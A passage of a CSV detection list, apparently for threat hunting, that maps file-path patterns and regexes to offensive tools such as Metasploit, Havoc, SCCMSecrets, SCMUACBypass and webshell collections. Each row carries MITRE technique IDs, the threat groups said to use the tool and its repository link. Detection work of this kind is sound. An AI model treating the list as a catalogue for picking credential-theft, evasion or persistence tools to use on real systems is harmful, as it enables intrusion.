"*/sbin/samunlock*",".{0,1000}\/sbin\/samunlock.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10698"
"*/sbin/samusrgrp*",".{0,1000}\/sbin\/samusrgrp.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10699"
"*/sc_inject/inject/*",".{0,1000}\/sc_inject\/inject\/.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","10700"
"*/scan4all.exe*",".{0,1000}\/scan4all\.exe.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","10701"
"*/scan4all.git*",".{0,1000}\/scan4all\.git.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","10702"
"*/scan4all.git*",".{0,1000}\/scan4all\.git.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","10703"
"*/scan4all.rb*",".{0,1000}\/scan4all\.rb.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","10704"
"*/scan4all/lib/api*",".{0,1000}\/scan4all\/lib\/api.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","10705"
"*/scan4all/lib/util*",".{0,1000}\/scan4all\/lib\/util.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","10706"
"*/ScanInterception.ps1*",".{0,1000}\/ScanInterception\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","10707"
"*/scanner/discovery*",".{0,1000}\/scanner\/discovery.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10708"
"*/scanner/kerberos*",".{0,1000}\/scanner\/kerberos.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10709"
"*/scanner/pcanywhere*",".{0,1000}\/scanner\/pcanywhere.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10710"
"*/scanner/portscan*",".{0,1000}\/scanner\/portscan.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10711"
"*/scanner/winrm*",".{0,1000}\/scanner\/winrm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10712"
"*/scannerPort.go*",".{0,1000}\/scannerPort\.go.{0,1000}","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Discovery","https://github.com/luijait/GONET-Scanner","1","1","N/A","network exploitation tool","N/A","1","82","21","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z","10713"
"*/scan-network.py*",".{0,1000}\/scan\-network\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","10714"
"*/Scans/servers_all_smb*.txt*",".{0,1000}\/Scans\/servers_all_smb.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","10715"
"*/ScareCrow -I *",".{0,1000}\/ScareCrow\s\-I\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/Dent","1","0","#linux","N/A","10","10","296","46","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z","10716"
"*/sccmhunter*",".{0,1000}\/sccmhunter.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","N/A","9","8","750","97","2025-04-03T15:58:02Z","2023-02-20T14:09:42Z","10717"
"*/SCCMSecrets.git*",".{0,1000}\/SCCMSecrets\.git.{0,1000}","offensive_tool_keyword","SCCMSecrets","SCCMSecrets.py aims at exploiting SCCM policies distribution for credentials harvesting - initial access and lateral movement.","T1555 - T1078 - T1070 - T1021","TA0006 - TA0008 - TA0001","N/A","N/A","Lateral Movement","https://github.com/synacktiv/SCCMSecrets","1","1","N/A","N/A","8","3","208","22","2024-12-17T14:29:39Z","2024-08-14T09:45:44Z","10718"
"*/SCCMVNC.git*",".{0,1000}\/SCCMVNC\.git.{0,1000}","offensive_tool_keyword","SCCMVNC","A tool to modify SCCM remote control settings on the client machine - enabling remote control without permission prompts or notifications. This can be done without requiring access to SCCM server.","T1078 - T1562 - T1557","TA0005 - TA0003 - TA0008","N/A","N/A","Lateral Movement","https://github.com/netero1010/SCCMVNC","1","1","N/A","N/A","8","1","87","10","2024-10-20T14:29:43Z","2024-10-20T14:15:28Z","10719"
"*/scdc/bob.jsp?f=fuckjp.jsp*",".{0,1000}\/scdc\/bob\.jsp\?f\=fuckjp\.jsp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","10720"
"*/ScheduleRunner.git*",".{0,1000}\/ScheduleRunner\.git.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","10721"
"*/SchTask.zip*",".{0,1000}\/SchTask\.zip.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","1","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","10722"
"*/SchTask_0x727.git*",".{0,1000}\/SchTask_0x727\.git.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","1","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","10723"
"*/SchTask_0x727/*",".{0,1000}\/SchTask_0x727\/.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","1","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","10724"
"*/schtasksenum/*.*",".{0,1000}\/schtasksenum\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","10725"
"*/sc-loader.exe*",".{0,1000}\/sc\-loader\.exe.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","10726"
"*/scmuacbypass.cpp*",".{0,1000}\/scmuacbypass\.cpp.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","10727"
"*/SCMUACBypass.exe*",".{0,1000}\/SCMUACBypass\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SCMUACBypass","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10728"
"*/SCMUACBypass.exe*",".{0,1000}\/SCMUACBypass\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SCMUACBypass","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10729"
"*/scmuacbypass.exe*",".{0,1000}\/scmuacbypass\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","10730"
"*/SCMUACBypass.git*",".{0,1000}\/SCMUACBypass\.git.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","10731"
"*/SCMUACBypass/*",".{0,1000}\/SCMUACBypass\/.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","10732"
"*/SCOMDecrypt.git*",".{0,1000}\/SCOMDecrypt\.git.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","10733"
"*/ScreenshotInject*",".{0,1000}\/ScreenshotInject.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","10734"
"*/script/reuse.py*",".{0,1000}\/script\/reuse\.py.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","#linux","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","10735"
"*/ScriptBlock-Smuggling.git*",".{0,1000}\/ScriptBlock\-Smuggling\.git.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","1","N/A","https://bc-security.org/scriptblock-smuggling/","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","10736"
"*/scripts/xor.py*",".{0,1000}\/scripts\/xor\.py.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","10737"
"*/ScriptSentry.git*",".{0,1000}\/ScriptSentry\.git.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","10738"
"*/ScriptSentry.ps1*",".{0,1000}\/ScriptSentry\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","10739"
"*/ScriptSentry.psd1*",".{0,1000}\/ScriptSentry\.psd1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","10740"
"*/ScriptSentry.psm1*",".{0,1000}\/ScriptSentry\.psm1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","10741"
"*/ScRunHex.py*",".{0,1000}\/ScRunHex\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/scrun","1","1","N/A","N/A","10","10","179","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z","10742"
"*/scshell*",".{0,1000}\/scshell.{0,1000}","offensive_tool_keyword","scshell","SCShell is a fileless Lateral Movement tool that relies on ChangeServiceConfigA to run commands. The beauty of this tool is that it does not perform authentication against SMB. Everything is performed over DCERPC.The utility can be used remotely WITHOUT registering a service or creating a service. It also doesn't have to drop any file on the remote system* (Depend on the technique used to execute)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","Lateral Movement","https://github.com/Mr-Un1k0d3r/SCShell","1","0","#linux","N/A","N/A","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","10743"
"*/scshell.py*",".{0,1000}\/scshell\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","10744"
"*/scuffy.py*",".{0,1000}\/scuffy\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","10745"
"*/sdb-explorer.exe*",".{0,1000}\/sdb\-explorer\.exe.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","1","N/A","N/A","9","1","37","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z","10746"
"*/SearchShares.ps1*",".{0,1000}\/SearchShares\.ps1.{0,1000}","offensive_tool_keyword","SearchOpenFileShares","Searches open files shares for password files or database backups - Extend as you see fit","T1083 - T1135 - T1005 - T1025","TA0007 - TA0009","N/A","Dispossessor","Discovery","https://github.com/fashionproof/SearchOpenFileShares","1","1","N/A","N/A","7","1","29","6","2019-12-13T12:37:42Z","2019-09-21T13:50:26Z","10751"
